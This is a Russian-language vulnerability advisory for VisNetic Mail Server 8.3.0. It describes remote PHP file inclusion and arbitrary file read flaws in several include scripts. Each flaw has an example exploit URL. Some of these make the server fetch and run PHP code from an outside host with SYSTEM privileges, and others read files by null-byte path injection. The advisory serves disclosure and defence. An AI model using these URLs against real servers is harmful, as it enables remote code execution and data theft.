Программа: VisNetic Mail Server 8.3.0 build 1, возможно более ранние версии
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к
потенциально важным данным и выполнить произвольный PHP код на целевой системе.
1. Уязвимость существует из-за недостаточной обработки входных данных в
переменных "language" и "lang_settings" в сценариях "/accounts/inc/include.php"
и "/admin/inc/include.php". Удаленный пользователь может переопределить
глобальные переменные и, с помощью специально сформированного URL, выполнить
произвольный PHP сценарий на целевой системе.
Пример:
http://[host]:32000/accounts/inc/include.php?language= 0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php?language= 0&lang_settings[0][1]=http://[host]/
Удачная эксплуатация уязвимости позволит злоумышленнику выполнить PHP сценарий с
привилегиями SYSTEM в конфигурации по умолчанию.
2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "lang" сценария "/dir/include.html". Удаленный пользователь может
просмотреть произвольные файлы на системе.
Пример:
http://[host]:32000/dir/include.html?lang=[file]%00
3. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "language" в сценарии "/mail/settings.html". Удаленный пользователь
может с помощью специально сформированного URL выполнить произвольный PHP
сценарий на целевой системе с привилегиями SYSTEM в конфигурации по умолчанию.
Пример:
http://[host]:32000/mail/settings.html?id=[current_id]&Save_x= 1&language=TEST
http://[host]:32000/mail/index.html?id=[current_id]&lang_settings [TEST]=test;http://[host]/;
4. Уязвимость существует из-за недостаточной инициализации переменных "default_layout"
и "layout_settings" при обработке неизвестного HTTP_USER_AGENT. Удаленный
пользователь может просмотреть произвольные файлы на системе. Пример:
Example (using non-IE/Mozilla/Firefox browser):
http://[host]:32000/mail/index.html?/mail/index.html?
default_layout=OUTLOOK2003&layout_settings [OUTLOOK2003]=test;[file]%00;2